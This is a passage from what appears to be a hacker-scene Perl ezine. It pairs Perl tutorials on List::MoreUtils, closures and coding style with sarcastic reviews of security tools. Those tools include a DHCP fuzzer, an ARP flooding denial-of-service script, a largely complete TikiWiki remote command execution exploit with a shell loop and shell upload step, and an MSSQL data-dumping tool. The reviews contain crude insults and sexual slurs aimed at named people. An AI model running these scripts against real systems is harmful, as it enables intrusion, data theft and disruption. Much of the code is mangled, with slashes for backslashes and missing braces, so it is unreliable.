condition, returning false as soon as one of the elements fails, rather
than iterating through the entire list:
  use List::MoreUtils qw(all);
  my $has_no_undef = all { defined $_ } @some_list;

Note that you could easily define any in terms of all and vice-versa, just
by negating both the condition and the result value. (These items are far
more efficient than their same-named ``equivalents'' in

If you negate only the result values (or just the condition, depending on
how you look at it), you get two other routines defined by
List::MoreUtils, none and notall:
  use List::MoreUtils qw(none notall);
  my $has_no_defined = none { defined $_ } @some_list;
  my $has_some_undef = notall { defined $_ } @some_list;

Like if vs unless or while vs until, having complementary routines gives
you the flexibility to spell out what you're actually looking for, rather
than requiring Perl (and the maintenance programmer) to figure out what
you mean with a bunch of not operations.

If you're just counting true and false values, true and false are at your
  use List::MoreUtils qw(true false);
  my $bigger_than_10_count = true { $_ > 10 } @some_list;
  my $not_bigger_than_10_count = false { $_ > 10 } @some_list;

Again, these are complementary, so use the one that reads better for your

The first_index and last_index routines return where an item appears. For
example, suppose I want to know which item is the first item that is
bigger than 10:
  use List::MoreUtils qw(first_index);
  my $where = first_index { $_ > 10 } 1, 2, 4, 8, 16, 32;

The result here is 4, indicating that 16 is the first item greater than
10. The index value is 0-based. If the item is not found, -1 is returned,
like Perl's built-in index search for strings. last_index works like
rindex, working from the upper end of the list rather than the lower end.

A more general version of this is indexes (not indices as you might
think), which returns all of the index values instead of just the first or
  use List::MoreUtils qw(indexes);
  my @where = indexes { $_ > 10 } 1, 2, 4, 8, 16, 32;

The result is 4, 5, showing that elements 4 and 5 of the input list match
the condition.

The apply routine is like the built-in map, but automatically localizes
the $_ value so we can safely change it within the block:
  use List::MoreUtils qw(apply);
  my @no_leading_blanks = apply { s/^/s+// } @input;

If we tried to do this with map:
  my @no_leading_blanks = map { s/^/s+// } @input;

then we'd see two problems. First, the result of a substitution is not the
new string, but the success value, so the outputs would simply be a series
of true and false values. Second, the $_ value is aliased to the inputs,
so @input would have been changed. Oops. The equivalent to the apply with
map would be something like:
  my @output = map { local $_ = $_; [apply action here]; $_ } @input;

And yes, the many times I've written map blocks that look just like that,
I could have replaced them with apply

And List::MoreUtils contains a few more routines as well, but I've now run
out of space. I hope you find this little trip into the ``utility belts''
of Perl fun and handy. Until next time, enjoy!

-[0x09] # Ilja is back, with shit Perl of course -------------------------


## At least your intro is interesting

# dhcp fuzzer, first without options
# will do options later ...
# update: - replaced obsolete Net::RawIP with more powerfull Net::Packet
# (a bit bitchy to install tho ...)
#	  - added totally unintelligent options fuzzing 
# Pretty hackish, but it seems to work ... 
# version 0.2 By Ilja van Sprundel.
# Todo: - give verbose output 
#	- run in deamon mode, find dhcp id's and remember mac addr 
#	- clean up the protocol implementation (I basicly copypasted what
# was in ethereal, ...)

# Net::Packet does a few annoying sleep()'s that I don't need 
# and they get in the way of fuzzing, so just preload perl 
# with the following tiny piece of code and all should be well. 
##define LIBC "/lib/"
#int sleep(int sec) {
#	 void *handle;
#	 int r = 0;
#	 int (*osleep)(int);
#	 handle = dlopen(LIBC, 1);
#	 osleep = dlsym(handle, "sleep");
#	 if (sec != 1)
#		 r = osleep(sec);
#	 dlclose(handle);
#	 return(r);

# while [ 1 ] ; do LD_PRELOAD=./ perl ; done

# bugs found: - dhcpdump (overflow (a plain stacksmash!), NULL ptr deref,
# endless loop)
#	      - tcpdump in verbose mode (-vv) slows it down A LOT (becomes
# pretty much unworkable)

# targets I still want to test: - solaris dhcpd (CMU dhcpd ?)
#				- ISC dhcpd
#				- windows dhcpd
#				- cisco dhcpd
#				- IBM OS/400 
#				- wingate dhcpd
#				- nat32 dhcpd (windows based dhcpd)

# No lexical variables? No warnings?
# Try these two pragmas:
# use strict;
# use warnings;

use Net::Packet qw($Env);
use Net::Packet::ETH;
use Net::Packet::IPv4;
use Net::Packet::UDP;
use Net::Packet::Frame;
use Net::Packet::Consts qw(:eth);
use Net::Packet::Consts qw(:ipv4);

$id = int(rand() * 10000000000) % (0xffffffff + 1); # change
						    # Yea, it needs it. :>
if ( int(rand() * 10) ) {
	$messagetype = int(rand() * 10) % 6;
} else {
	$messagetype = int(rand() * 1000) % 256;

if ( int(rand() * 10) ) {
	$hwtype = int(rand() * 10) % 6; 
} else {
	$hwtype = int(rand() * 1000) % 256;

$hwlen = int(rand() * 1000) % 256;

if ( int(rand() * 10) ) {
	$hops = 0;
} else {
	$hops = int(rand() * 1000) % 256;

if ( int(rand() * 10) ) {
	$seconds = int(rand() * 10) % 16;
} else {
	$seconds = int(rand() * 100000) % 65536;

if ( int(rand() * 10) ) {
	$flags = 0x0000;
} else {
	$flags = int(rand() * 100000) % 65536;

# Don't you get annoyed at having this over and over again?
$clientip = int(rand() * 10000000000) % (0xffffffff + 1);
$yourip = int(rand() * 10000000000) % (0xffffffff + 1);
$nextip = int(rand() * 10000000000) % (0xffffffff + 1);
$relayip = int(rand() * 10000000000) % (0xffffffff + 1);

open($fd, "/dev/urandom"); # Nice call to open() there buddy 
			   # open(my $fd, '<', '/dev/urandom') or die
"Can't open() /dev/urandom./n";

if ( int(rand() * 10) ) {
	$clientaddr =
	# my $clientaddr = "/x00" x 16;
} else {
	read($fd, $clientaddr, 16);

if ( int(rand() * 10) ) {
	$sname =
       # my $sname = "/x00" x 64;
} else {
	read($fd, $sname, 64);

if ( int(rand() * 10) ) {
	$file =
	# my $file = "/x00" x 128;
} else {
	read($fd, $file, 128);

# this is the options fuzzing  :)  h4h4 

# h4h4 1nd33d

read($fd, $tmp, (int(rand() * 1000) % 256) );
$data = pack("C", $messagetype) . pack("C", $hwtype) . pack("C", $hwlen) .
pack("C", $hops) . 
	pack("I", $id) . pack("n",$seconds) . pack("n", $flags) .
pack("N", $clientip) . 
	pack("N", $yourip) . pack("N", $nextip) . pack("N", $relayip) .
$clientaddr . 
	$sname . $file . $tmp . "/xff"; # Eh, at least you space your
					# concactination operator nicely, not
					# like those PHP coders.
					# But damn you don't realize that
pack can take a list

print ("Length: " . length($data) . "/n"); # nice parens there

# you gotta love Net::Packet !!!! 

# Yup. You also gotta love how your variables suddenly become lexical...
my $eth = Net::Packet::ETH->new(type => NP_ETH_TYPE_IPv4, dst  =>
my $ip = Net::Packet::IPv4->new(src => '', dst =>
'', protocol => NP_IPv4_PROTOCOL_UDP);
my $udp = Net::Packet::UDP->new(src => 68, dst => 67);
my $content = Net::Packet::Layer7->new(data => $data);
my $frame = Net::Packet::Frame->new(l2 => $eth, l3 => $ip, l4 => $udp, l7
=> $content);
# Nice spacing.

# Ilja you sure make it look like you did a lot more work than you did. 
# You have the creativity of a 19th century Polish serf...motherfucker!

# Ilja, how's working at suresec? Are they paying you by the blowjob like 
# Immunity?

-[0x0A] # A little teaser about higher-order functions -------------------

How A Function Becomes Higher Order

Higher Order Perl, by Dominus, has become a very popular book. It was
written to teach programmers how to transform programs with programs. Many
of us who do not have familiarity with Functional Programming are not
aware of what a Higher Order function is. It is a function that does at
least one of the two following things: 
Accepts a function as input
Returns a function as output

For some, you can stop reading here because you already know what Higher
Order functions are - you just didn't know that's what they were called.
In Perl terminology, we often refer to them as callbacks, factories, and
functions that return code refs (usually closures). Even if you are
familiar with those terms, you may not be familiar with how to use them. 

This tutorial is an illustration of how a simple every day function may
become higher order, increasing its usefulness in the process. Along the
way we will pick up other tricks that can make our code more flexible. 
Problem: We have a file containing a list of scores and we need to
determine the highest score.

Using the principal of code reuse and not reinventing the wheel, we turn
to our trusty List::Util. 
use List::Util 'max';
my @scores = <FH>;
my $high_score = max(@scores);

Unfortunately, this requires all of the scores to be held in memory at one
time and our file is really big. Just this once, we decide to break the
rules and roll our own. 
my $high_score;
while ( <FH> ) {
    $high_score = $_ if ! defined $high_score || $_ > $high_score;

As time goes by "just this once" has happened many times and we decide to
make our version reuseable. 
sub gen_max {
    # Create an initial default value (or undef)
    my $max = $_[0];

    # Create an anonymous sub that can be
    # dereferenced and called externally
    # but will still have access to $max
    return sub {

	# Process 1 or more values
	for ( @_ ) {
	    $max = $_ if ! defined $max || $_ > $max;
	return $max;

my $max = gen_max();
while ( <FH> ) {

    # Dereference and call the anonymous sub
    # Passing in 1 value at a time

# Get the return value of the anonymous sub
my $high_score = $max->();

This is our first step into Higher Order functions as we have returned a
function as the output for the sake of reusability. We also have a few
advantages over the original List::Util max function. 
Does not require all values to be present at once
Ability to define a starting value
Ability to process one or more values at a time

Unfortunately, our function breaks the second we start comparing strings
instead of numbers. We could make max() and maxstr() functions like
List::Util but we want to use the concept of Higher Order functions to
increase the versatility of our single function. 
sub gen_reduce {
    my $usage = 'Usage: gen_reduce("initial" => $val, "compare" => 

    # Hashes need even number of arguments
    die $usage if @_ % 2;
    my %opt = @_;

    # Verify that compare defined and a code reference
    die $usage if ! defined $opt{compare} || ref $opt{compare} ne 
    my $compare = $opt{compare};
    my $val = $opt{initial};

    return sub {
	for ( @_ ) {

	    # Call the user defined anonymous sub
	    # Passing in two parameters using the return
	    $val = $_ if ! defined $val || $compare->($_,  $val);
	return $val;

# Create an anonymous sub that takes two arguments
# A true value is returned if the first is longer 
my $comp = sub {
    return length($_[0]) > length($_[1]);

my $maxstr = gen_reduce(compare => $comp );
while ( <FH> ) {
my $long_str = $maxstr->();

Now our function takes a function as input and returns a function as
output. In addition to the previous functionality, we have added a few
more features. 
Named parameters - allows flexibility in ordering and presence of
arguments as well as ease in extensibility
User defined comparator - our max function has now become a reduce

This does not have to be the end of the journey into Higher Order
functions, though it is the end of the tutorial. Whenever you encounter a
situation where two programs do nearly identical things but their
differences are enough to make using a single function impossible -
consider Higher Order functions to bridge the gap. Remember - it is
important to always document your interface and assumptions well! 

I open the floor to comments both on the advantages and disadvantages of
Higher Order functions. As they say, there is no such thing as a free
lunch and there are always cases in which it makes sense to use distinct
routines for distinct problems.

-[0x0B] # Intermission ---------------------------------------------------

There's a certain personality who narrowly missed being included in this
edition. He has been excluded to acknowledge the improvements in his
person over the years. He is not who he was; one character died and another
spawned. We can't confirm that the new one is any better at Perl, but at 
least he discloses less shit upon our fair internet. 

Perhaps you will recognize some of his work?

elsif($FORM{'file'} =~ /.(/)*./g){

open(DB, ">>database.txt") or open(DB, ">database.txt");

if ($bannernoton == 0 && $_ =~ m/<html>/ig){

Those three lines, from three different scripts, are all bad in multiple
embarassing ways. 

-[0x0C] # kokanin is washed-up and wrung out -----------------------------

03:04 < r0ny> who is this ezine?
03:06 < r0ny>
03:09 < bfamredux> some perl coders
03:09 < kronicd> theres a lot of hate there
03:12 < bfamredux> i don't think it's hate as much as it ripping on
people's perl coding
03:15 <@aton> -[0x01] # kokanin sucks
03:15 <@aton> haha

The historians among you might note that kokanin was the very first 
article in the very first Perl Underground. Here's to our man!

# kokanin@gmail dot com 20070604
# ARP dos, makes the target windows pc unusable for the duration of the
# <mode> determines if we send directly or via broadcast, bcast seems
# to be more effective (works even when printing info locally)
# Why store mac addresses for addresses outside ones subnet? Weird.
# FIXME: sometimes this crashes on the first run due to a slow arp reply

use Net::ARP 1.0;
use Net::RawIP;

$mode = shift;
$interface = shift;
$host = shift;

if(!$host){ print "usage: $0 <bcast|direct> <interface> <host>/n";
exit(-1); }

sub r { return int(rand(255)); }

if( $mode =~ /direct/ ) {
  print "sending syn packet to add local ARP entry/n";
  $pkt = new Net::RawIP;
  print "looking up mac address/n";
  $dmac = Net::ARP::arp_lookup($interface,$host);
else {
  $dmac = "ff:ff:ff:ff:ff:ff";

print "sending arp packets, press ctrl-c to stop/n";
  $randip = sprintf("%d.%d.%d.%d",r(),r(),r(),r());
  $smac = sprintf("%x:%x:%x:%x:%x:%x",r(),r(),r(),r(),r(),r());
# this slows it down.
# if( $mode =~ /bcast/ ) { print "$interface://$randip/$smac ->
$host/$dmac/n"; } 
  Net::ARP::send_packet( $interface,$randip,$host,$smac,$dmac,request);

A lot needs to change in this script. strict and warnings should be in
effect. Lexical variables, @ARGV over triple shifting, decent spacing 
and parenthesis removal, etc.

However, we include this here to actually commend kokanin in a way.
Basically, we think he's come a long way in a few years and this program
 is respectable in this world of shit code. Congrats kokanin, here's to 

-[0x0D] # broquaint always writes nice articles --------------------------

Closure on Closures
by broquaint

Closure on Closures

Before we get into this tutorial we need to define what a closure is. The
Camel (3rd edition) states that a closure is 

"when you define an anonymous function in a particular lexical scope at any
particular moment"

However, I believe this isn't entirely accurate as a closure in perl can
be any subroutine referring to lexical variables in the surrounding
lexical scopes.[0] 

Now with that (simple?) definition out of the way, we can get on with the

Before we get started ... 

For one to truely understand closures a solid understanding of the
principles of lexical scoping is needed, as closures are implemented
through the means of lexical scoping interacting with subroutines. For an
introduction to lexical scoping in perl see Lexical scoping like a fox,
and once you're done with that, head on back. 

Right, are we all here now? Bueller ... Bueller .. Bueller? Good.
Now that we have our basic elements, let's weave them together with a
stitch of explanation and a thread of code. 

Hanging around 

Now as we all know, lexical variables are only active for the length of
the surrounding lexical scope, but can be kept around in an indirect
manner if something else references them e.g 
 1: sub DESTROY { print "stick a fork in '$_[0]' it's done/n" }
 3: my $foo = bless [];
 4: {
 5:   my $bar	 = bless {};
 6:   ## keep $bar around
 7:   push @$foo => /$bar;
 9:   print "in /$bar's [$bar] lexical scope/n";
10: }
12: print "we've left /$bar's lexical scope/n";


in $bar's [main=HASH(0x80fbbf0)] lexical scope
we've left $bar's lexical scope
stick a fork in 'main=ARRAY(0x80fbb0c)' it's done
stick a fork in 'main=HASH(0x80fbbf0)' it's done
The above example illustrates that $bar isn't cleaned up until $foo, which
references it, leaves the surrounding lexical scope (the file-level scope
in this case). So from that we can see lexical variables only stick around
for the length of the surrounding scope or until they're no longer

But what if we were to re-enter a scope where a variable is still visible,
but the scope has already exited - will the variable still exist? 
1: {
2:   my $foo = "a string";
3:   INNER: {
4:     print "/$foo: [$foo]/n";
5:   }
6: }
7: goto INNER unless $i++;


$foo: [a string]
$foo: []
As we can see the answer is categorically 'No'. In retrospect this is
quite obvious as $foo has gone out of scope and there is no longer a
reference to it. 

A bit of closure 

However, the last example just used a simple bareblock, now let's try it
with a subroutine as the inner block 
1: {
2:   my $foo = "a string";
3:   sub inner {
4:     print "/$foo: [$foo]/n";
5:   }
6: }
7: inner();
8: inner();


$foo: [a string]
$foo: [a string]
"Hold on there cowboy - $foo has already gone out of scope at the time of
the first call to inner() let alone the second, what's going on there?!?",
or so one might say. Now hold your horses, there is a very good reason for
this behaviour - the subroutine in the example is a closure. "Ok, so it's
a closure, but why?", would be a good question at this point. The reason
is that subroutines in perl have what's called a scratchpad which holds
references to any lexical variables referred to within the subroutine.
This means that you can directly access lexical variables within
subroutines even though the given variables' scope has exited. 

Hmmm, that was quite a lot of raw info, so let's break it down somewhat.
Firstly subroutines can hold onto variables from higher lexical scopes.
Here's a neat little counter example (not counter-example  ;)  
 1: {
 2:   my $cnt = 5;
 3:   sub counter {
 4:	return $cnt--;
 5:   }
 6: }
 8: while(my $i = counter()) {
 9:	print "$i/n";
10: }
11: print "BOOM!/n";


While not immediately useful, the above example does demonstrate a
subroutine counter() (line 3) holding onto a variable $cnt (line 2) after
it has gone out of scope. Because of this behaviour of capturing lexical
state the counter() subroutine acts as a closure. 

Now if we look at the above example a little closer we might notice that
it looks like the beginnings of a basic iterator. If we just tweak
counter() and have it return an anonymous sub we'll have ourselves a very
simple iterator 
 1: sub counter {
 2:   my $cnt = shift;
 3:   return sub { $cnt-- };
 4: }
 6: my $cd = counter(5);
 7: while(my $i = $cd->()) {
 8:   print "$i/n";
 9: }
11: print "BOOM!/n";


Now instead of counter() being the closure we return an anonymous
subroutine (line 3) which becomes a closure as it holds onto $cnt (line
2). Every time the newly created closure is executed the $cnt passed into
counter() is returned and decremented (this post-return modification
behaviour is due to the nature of the post-decrement operator, not the

So if we further apply the concepts of closures we can write ourselves a
very basic directory iterator 
 1: use IO::Dir;
 3: sub dir_iter {
 4:   my $dir = IO::Dir->new(shift) or die("ack: $!");
 6:   return sub {
 7:	my $fl = $dir->read();
 8:	$dir->rewind() unless defined $fl;
 9:	return $fl;
10:   };
11: }
13: my $di = dir_iter( "." );
14: while(defined(my $f = $di->())) {
15:   print "$f/n";
16: }


In the code above dir_iter() (line 3) is returning an anonymous subroutine
(line 6) which is holding $dir (line 4) from a higher scope and therefore
acts as a closure. So we've created a very basic directory iterator using
a simple closure and a little bit of help from IO::Dir. 

Wrapping it up 

This method of creating closures using anonymous subroutines can be very
powerful[1]. With the help of Richard Clamp's marvellous File::Find::Rule
we can build ourselves a handy little grep like tool for XML files 
 1: use strict;
 2: use warnings;
 4: use XML::Simple;
 5: use Getopt::Std;
 6: use File::Basename;
 7: use File::Find::Rule;
 8: use Data::Dumper;
10: $::PROGRAM = basename $0;
12: getopts('n:t:hr', my $opts = {});
14: usage() if $opts->{h} or @ARGV == 0;
16: my @dirs	 = $opts->{r} ? @ARGV	: map dirname($_),  @ARGV;
17: my @files	 = $opts->{r} ? '*.xml' : map basename($_), @ARGV;
18: my $callback = gensub($opts);
20: my @found = find(
21:   file => 
22:   name => /@files,
23:   ## handy callback which wraps around the callback created above
24:   exec => sub { $callback->( XMLin $_[-1] ) },
25:   in   => [ @dirs ]
26: );
28: print "$::PROGRAM: no files matched the search criteria/n" and exit(0)
29:   if @found == 0;
31: print "$::PROGRAM: the following files matched the search criteria/n",
32:	  map "/t$_/n", @found;
34: exit(0);
36: sub usage {
37:   print "Usage: $::PROGRAM -t TEXT [-n NODE -h -r] FILES/n";
38:   exit(0);
39: }
41: sub gensub {
42:   my $opts	= shift;
44:   ## basic matcher wraps around the program options
45:   return sub { Dumper($_[0]) =~ //Q$opts->{t}/sm }
46:	unless exists $opts->{n};
48:   ## node based matcher wraps around options and itself!
49:   my $self; $self = sub {
50:	my($tree, $seennode) = @_;
52:	for(keys %$tree) { 
53:	  $seennode = 1 if $_ eq $opts->{n};
55:	  if( ref $tree->{$_} eq 'HASH') {
56:	    return $self->($tree->{$_}, $seennode);
57:	  } elsif( ref $tree->{$_} eq 'ARRAY') {
58:	    return !!grep $self->($_, $seennode), @{ $tree->{$_} };
59:	  } else {
60:	    next unless $seennode;
61:	    return !!1
62:	      if $tree->{$_} =~ //Q$opts->{t}/;
63:	  }
64:	}
65:	return;
66:   };
68:   return $self;
69: }
Disclaimer: the above isn't thoroughly tested and isn't nearly perfect so
think twice before using in the real world 

The code above contains 3 simple examples of closures using anonymous
subroutines (in this case acting as callbacks). The first closure can be
found on in the exec parameter (line 24) of the find call. This is
wrapping around the $callback variable generated by the gensub() function.
Then within the gensub() (line 41) there are 2 closures which wrap around
the $opts lexical, the second of which also wraps around $self which is a
reference to the callback which is returned. 

Altogether now 

So let's bring it altogether now - a closure is a subroutine which wraps
around lexical variables that it references from the surrounding lexical
scope which subsequently means that the lexical variables that are
referenced are not garbage collected when their immediate scope is exited.

There ya go, closure on closures! Hopefully this tutorial has conveyed the
meaning and purpose of closures in perl and hasn't been too confounding
along the way. 

Thanks to virtualsue, castaway, Corion, xmath, demerphq, Petruchio, tye
for help during the construction of this tutorial 

[0] see. chip's Re: Toggling between two values for a more technical
definition (and discussion) of closures within perl
[1] see. tilly's Re (tilly) 9: Why are closures cool?, on the pitfalls of
nested package level subroutines vs. anonymous subroutines when dealing
with closures

-[0x0E] # str0ke's token appearance --------------------------------------

# TikiWiki &lt;= 1.9.8 Remote Command Execution Exploit
# Description
# -----------
# TikiWiki contains a flaw that may allow a remote attacker to execute
arbitrary commands. 
# The issue is due to 'tiki-graph_formula.php' script not properly
sanitizing user input 
# supplied to the f variable, which may allow a remote attacker to execute
arbitrary PHP 
# commands resulting in a loss of integrity.
# -----------
# Vulnerability discovered by ShAnKaR &lt;sec [at];
# $Id:,v 0.1 2007/10/12 13:25:08 str0ke Exp $

# Wow, five issues and five pieces of code by str0ke!
# We debated not including him in here, but hey, it's like a tradition now.

use strict; # Hey, you're learning! But you still forgot to enable warnings.
use LWP::UserAgent;

my $target = shift || &usage(); # Oh my... how 1996
my $proxy = shift;
my $command;

# Try this:
# my($target, $proxy) = @ARGV;

&exploit($target, "cat db/local.php", $proxy); # Wow, another flashback!

print "[?] php shell it?/n";;
print "[*] wget -O
print "[*] lynx " . $target . "/backups/shell.php/n/n";

	print "tiki/# ";
	chomp($command = <STDIN>); # You do realize that you can declare
				   # $command down here right?
				   # chomp(my $command = <STDIN>);
				   # Then we can lose that annoying
				   # decleration up at the top of the code.
	exit unless $command; # Not bad.
	&exploit($target, $command, $proxy); 
	# You really must like the &'s, eh?

sub usage()
	print "[?] TikiWiki &lt;= 1.9.8 Remote Command Execution
Exploit/n"; # ph33r
	print "[?] str0ke <str0ke[!]>/n";
	print "[?] usage: perl $0 [target]/n";
	print " 	[target] (ex.";
	print " 	[proxy] (ex.";
	# You could have used a text area with a die instead of all those
	# print's followed by an exit. If you're going to use print, 
	# at least change your quoting style. 

sub exploit()
	my($target, $command, $proxy) = @_; # Not bad. 

	my $cmd = 'echo start_er;'.$command.';'.'echo end_er'; 
# There's the correct use of the . operator! But you forgot the whitespace!
# So close, but yet so far...
	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*',
	# You don't need to assign to $_, and in different situations that
	# would be hazardous

	my $conn = LWP::UserAgent->() or die; # Good use of or there
# instead of ||. I see that you have been paying attention to our
					      # previous issues.  :)  
	$conn->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0;
	$conn->proxy("http", "http://".$proxy."/") unless !$proxy; 
# Try the 'not' keyword instead of '!'. And way to be convoluded. 
# $conn->proxy(..) if $proxy; # just way to clear for you.
# I know that coding obfuscated Perl is a pasttime for most Perly types,
# but you hardly fall into that category my friend. 
	# Way to be consistant with your concaticnations there.

	if ($out->content =~ m/start_er(.*?)end_er/ms) { 
# Perl doesn't need to be told it's a match
		print $1 . "/n";
	} else { 
		print "[-] Exploit Failed/n"; # Just like this code...
		exit; # Why not try die? After all, you don't want to exit
			# indicating success when it didn't succeed.

# [2007-10-12] 
# PU5

-[0x0F] # Abigail goes stylish -------------------------------------------

( It is important to note that this is old, and some things about the
language have changed. Further, a handful of these points were never
the popular view in the Perl world. So keep those in mind. )


Last week, hakkr posted some coding guidelines which I found to be too
restrictive, and not addressing enough aspects. Therefore, I've made some
guidelines as well. These are my personal guidelines, I'm not enforcing
them on anyone else. 

~ Warnings SHOULD be turned on. ~

Turning on warnings helps you finding problems in your code. But it's only
useful if you understand the messages generated. You should also know when
to disable warnings - they are warnings after all, pointing out potential
problems, but not always bugs. 

~ Larger programs SHOULD use strictness. ~

The three forms of strictness can help you to prevent making certain
mistakes by restricting what you can do. But you should know when it is
appropriate to turn off a particular strictness, and regain your freedom. 

~ The return values of system calls SHOULD be checked. ~

NFS servers will be down, permissions will change, file will disappear,
disk will fill up, resources will be used up. System calls can fail for a
number of reasons, and failure is not uncommon. Programs should never
assume a system call will succeed - they should check for success and deal
with failures. The rare case where you don't care whether the call
succeeded should have a comment saying so. 

All system calls should be checked, including, but not limited to, close,
seek, flock, fork and exec. 

~ Programs running on behalf of someone else MUST use tainting; Untaining
  SHOULD be done by checking for allowed formats. ~

Daemons listening to sockets (including, but not limited to CGI programs)
and suid and sgid programs are potential security holes. Tainting can help
securing your programs by tainting data coming from untrusted sources. But
it's only useful if you untaint carefully: check for accepted formats. 

~ Programs MUST deal with signals appropriately. ~

Signals can be sent to the program. There are default actions - but they
are not always appropriate. If not, signal handlers need to be installed.
Care should be taken since not everything is reentrant. Both pre-5.8.0 and
post-5.8.0 have their own issues. 

~ Programs MUST deal with early termination appropriately. ~

END blocks and __DIE__ handlers should be used if the program needs to
clean up after itself, even if the program terminates unexpectedly - for
instance due to a signal, an explicite die or a fatal error.
~ Programs MUST have an exit value of 0 when running succesfully, and a
  non-0 exit value when there's a failure. ~

Why break a good UNIX tradition? Different failures should have different
exit values. 

~ Daemons SHOULD never write to STDOUT or STDERR but SHOULD use the syslog
  service to log messages. They should use an appropriate facility and
  appropriate priorities when logging messages. ~

Daemons run with no controlling terminal, and usually its standard output
and standard error disappear. The syslog service is a standard UNIX
utility especially geared towards daemons with a logging need. It allows
the system administration to determine what is logged, and where, without
the need to modify the (running) program. 

~ Programs SHOULD use Getopt::Long to parse options. Programs MUST follow
  the POSIX standard for option parsing. ~

Getopt::Long supports historical style arguments (single dash, single
letter, with bundling), POSIX style, and GNU extensions. Programs should
accept reasonable synonymes for option names. 

~ Interactive programs MUST print a usage message when called with wrong,
  incorrect or incomplete options or arguments. ~

Users should know how to call the program. 

~ Programs SHOULD support the --help and --version options. ~

--help should print a usage message and exit, while--version should the
version number of the program. 

~ Code SHOULD have an exhaustive regression test suite. ~

Regression tests help catch breakage of code. The regression tests should
'touch' all the code - that is, every piece of code should be executed
when running the regression suite. All border should be checked. More
tests is usually better than less test. Behaviour on invalid inputs needs
to be tested as well. 

~ Code SHOULD be in source control. ~

And a code source control tool will take care of keeping track of a
history or changes log, version numbers and who made the most recent

~ All database modifying statements MUST be wrapped inside a transaction. ~

Your data is likely to be more important than the runtime or codesize of
your program. Data integrety should be retained at all costs. 

~ Subroutines in standalone modules SHOULD perform argument checking and
  MUST NOT assume valid arguments are passed. ~

Perl doesn't compile check the types of or even the number of arguments.
You will have to do that yourself. 

~ Objects SHOULD NOT use data inheritance unless it is appropriate. ~

This means that "normal" objects, where the attributes are stored inside
anonymous hashes or arrays should not be used. Non-OO programs benefit
from namespaces and strictness, why shouldn't objects? Use objects based
on keying scalars, like fly-weight objects, or inside-out objects. You
wouldn't use public attributes in Java all over the place either, would

~ Comments SHOULD be brief and to the point. ~

If you need lots of comments to explain your code, you may consider
rewriting it. Subroutines that have a whole blob of comments describing
arguments are return values are suspect. But do document invariants, pre-
and postconditions, (mathematical) relationships, theorems, observations
and other relevant things the code assumes. Variables with a broad scope
might warrant comments too. 

~ POD SHOULD NOT be interleaved with the code, and is not an alternative for
  comments. ~

Comments and POD have two different purposes. Comments are there for the
programmer. The person who has to maintain the code. POD is there to
create user documentation from. For the person using the code. POD should
not be interleaved with the code because this makes it harder to find the

~ Comments, POD and variable names MUST use English. ~

English is the current Lingua Franca. 

~ Variables SHOULD have an as limited scope as is appropriate. ~

"No global variables", but better. Just disallowing global variables means
you can still have a loop variant with a file-wide scope. Limiting the
scope of variables means that loop variants are only known in the body of
the loop, temporary variables only in the current block, etc. But
sometimes it's useful for a variable to be global, or have a file-wide

~ Variables with a small scope SHOULD have short names, variables with a
  broad scope SHOULD have descriptive names. ~

$array_index_counter is silly; for (my $i = 0; $i < @array; $i ++) { .. }
is perfect. But a variable that's used all over the place needs a
descriptive name. 

~ Constants (or variables intended to be constant) SHOULD have names in all
  capitals, (with underscores separating words), so SHOULD IO handles.
  Package and class names SHOULD use title case, while other variables
  (including subroutines) SHOULD use lower case, words separated by
  underscores. ~

This seems to be quite common in the Perl world. 

~ Custom delimiters SHOULD be tall and skinny. ~

/, !, | and the four sets of braces are acceptable, #, @ and * are not.
Thick delimiters take too much attention. An exception is made for:  q
$Revision:$, because RCS and CVS scan for the dollars. 

~ Operators SHOULD be separated from their operands by whitespace, with a
  few exceptions. ~

Whitespace increases readability. The exceptions are: 
Unary +, -, /, ~ and !. 
No whitespace between a comma and its left operand. 

Note that there is whitespace between ++ and -- and their operands, and
between -> and its operands. 

~ There SHOULD be whitespace between an indentifier and its indices. There
  SHOULD be whitespace between successive indices. ~

Taking an index is an operation as well, so there should be whitespace.
Obviously, we cannot apply this rule in interpolative contexts. 

~ There SHOULD be whitespace between a subroutine name and its parameters,
even if the parameters are surrounded by parens. ~

Again, readability. 

~ There SHOULD NOT be whitespace after an opening parenthesis, or before a
  closing parenthesis. There SHOULD NOT be whitespace after an opening
  indexing bracket or brace, or before a closing indexing bracket or 
  brace. ~

That is: $array [$key], $hash {$key} and sub ($arg). 

~ The opening brace of a block SHOULD be on the same line as the keyword and
  the closing brace SHOULD align with the keyword, but short blocks are
  allowed to be on one line. ~

This is K&R style bracing, except that we require it for subroutines as
well. We do allow map {$_ * $_} @args to be on one line though. 
No cuddled elses or elsifs. But the while of a do { } while construct
should be on the same line as the closing brace. 

It just looks better that way!  ;-)  

~ Indents SHOULD be 4 spaces wide. Indents MUST NOT contain tabs. ~

4 spaces seems to be an often used compromise between the need to make
indents stand out, and not getting cornered. Tabs are evil. 

~ Lines MUST NOT exceed 80 characters. ~

There is just no excuse for that. More than 80 characters means it will
wrap in too many situations, leading to hard to read code. 

~ Align code vertically. ~

This makes code look more pleasing, and it brings attention to the fact
similar things are happening on close by lines. Example: 
    my $var	 =  18;
    my $long_var = "Some text";
This is just a first draft. I've probably forgotten some rules.

-[0x10] # It's h4cky0u, not c0dey0u --------------------------------------

use LWP::UserAgent;

# No warnings? No lexical variables?
# Haven't you people learned yet?!?

print "/n		   -----------------------------		 ";
print "/n			 MSSQL Dumper v0.1.1			 ";
print "/n			     ALPHA				 ";
print "/n		     By Illuminatus for h4cky0u 		 ";
print "/n		   -----------------------------		 ";
print "/n";

# Ahhh yes... the always needed eleet startup banner proudly proclaiming
# that this shitty code was done by a
# shitty coder for an equally shitty site/group.

my $ua = LWP::UserAgent->new; # Ripped right from the man page...
$colcount = 0;

sub args{
    print "Hostname (e.g";$host = <STDIN>;chomp $host;
    print "Path (e.g /products.asp?catid=):";$path = <STDIN>;chomp $path;
    print "Database:";$db = <STDIN>;chomp $db;
    print "Database table:";$table = <STDIN>;chomp $table;
    print "How many columns would you like to dump:";$colnum =
<STDIN>;chomp $colnum;

    print "Column names (format: User,Password):";$colnames =
<STDIN>;chomp $colnames;@cols = split(/,/, $colnames);
    print "Records to dump (format: 1-23):";$rec = <STDIN>;chomp
$rec;@recs = split (/-/, $rec);
    $count = @recs[0]; # ... Don't ever let him near a Perl interpreter again.
    # I loved the spacing in that subroutine. And the way he got that
    # input was amazing!
    # Hey, Illuminatus try: chomp(my $foo = <STDIN>);
    # And do you see that enter key on your keyboard? Use it next time buddy.
